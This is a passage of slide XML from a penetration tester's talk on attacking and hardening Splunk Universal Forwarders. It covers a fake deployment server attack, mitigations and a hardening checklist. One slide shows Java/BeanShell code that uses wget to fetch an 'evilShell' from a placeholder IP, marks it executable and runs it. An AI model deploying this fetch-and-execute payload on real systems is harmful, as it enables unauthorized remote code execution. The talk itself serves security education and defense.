              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Won’t stop the fake Deployment Server attack but makes it a lot more difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Encrypted Command and Control is just good practice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="977366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ADD1C-C43E-7745-BF21-5D1AF50FA4FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Mitigations: Run Unprivileged</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EACE9781-3CFF-A44C-BAE1-905815C89E24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Most difficult</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Requires all forwarded logs to be readable by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>SELinux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> may cause problems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Not always effective</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> User </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>runas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> option was available to unprivileged </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> services start as root, then forks to assigned user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.splunk.com/view/SP-CAAAP3M</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Lock down </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>splunk-launch.conf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27586300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2D3A4-09D1-6949-B9C9-4311A66E7227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Forwarder Hardening Guide</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C13308F-A737-304B-849A-78A80CCAFF41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/MattUebel/splunk_UF_hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing Service Account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Changing Credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disabling REST Port</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Deployment Server Hardening/Monitoring</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SSL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2239933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78538-5ED2-4CA5-8192-D5BB13E8BCD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Anthony Hendricks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F11F2BDB-FD3A-4CBE-BDE6-71E4D1CDB3AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>I break things for a living</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Penetration Tester at Defense Point Security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disclaimer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This talk is my own work and may not necessarily reflect the views of my employer.  This is not intended to shame any companies mentioned, instead focus the importance of good application deployment and installation procedures</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3202828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pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Thanks to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Duane Waddle (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>duckfez</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Matt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Uebel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>muebel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>George </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Starcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>georgestarcher</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Jason </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>Ashbaugh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> (@</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>techxicologist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1162682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98510-ADDB-204C-9B09-8B6656B1B9C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Background</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7426DAF-CBD9-4C45-8F4E-A9D17C1969AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>For those not familiar</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1"/>
              <a:t>Splunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t> is a logging platform/SIEM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Typically uses agents called ”Universal Forwarders” (aka Forwarders) for sending</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Forwarders can be configured</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Manually via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>config</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t> files</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Via deployment server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1690948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B220F6B-DFC5-6048-B0E8-0F680941B9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1131" y="643466"/>
            <a:ext cx="7029737" cy="5571067"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="675359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the Stage</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" err="1"/>
              <a:t>Pentesting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t> a web application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Well secured, modern coding practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>JS-heavy, not much dynamic content</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0"/>
              <a:t>Until…..</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2974207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The Pentest Begins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200"/>
              <a:t>Discovered Adobe Livecycle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800"/>
              <a:t>Adobe kindly provides a scripting interface for all of their applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{858498E3-68D2-DA40-B9CA-1D4A7605C514}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5381625" y="1591834"/>
            <a:ext cx="1428750" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9DCCB33A-7FA1-6545-90F5-1737538769D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4581525" y="4524556"/>
            <a:ext cx="3028950" cy="2019300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2670786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Java/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Beanshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Code</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java.lang</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java.util</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import java.io.*;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import java.net.*;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cmd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usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "http://&lt;IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilShell</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Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().exec(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</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exec("/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 700 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilShell</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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = {"/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>", "-c", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evilShell</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Runtime.getRuntime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>().exec(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8653EEA0-63F4-5E48-A004-5E02BB4F7BBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5894173" y="1408670"/>
            <a:ext cx="2291526" cy="2090988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="78711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Shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
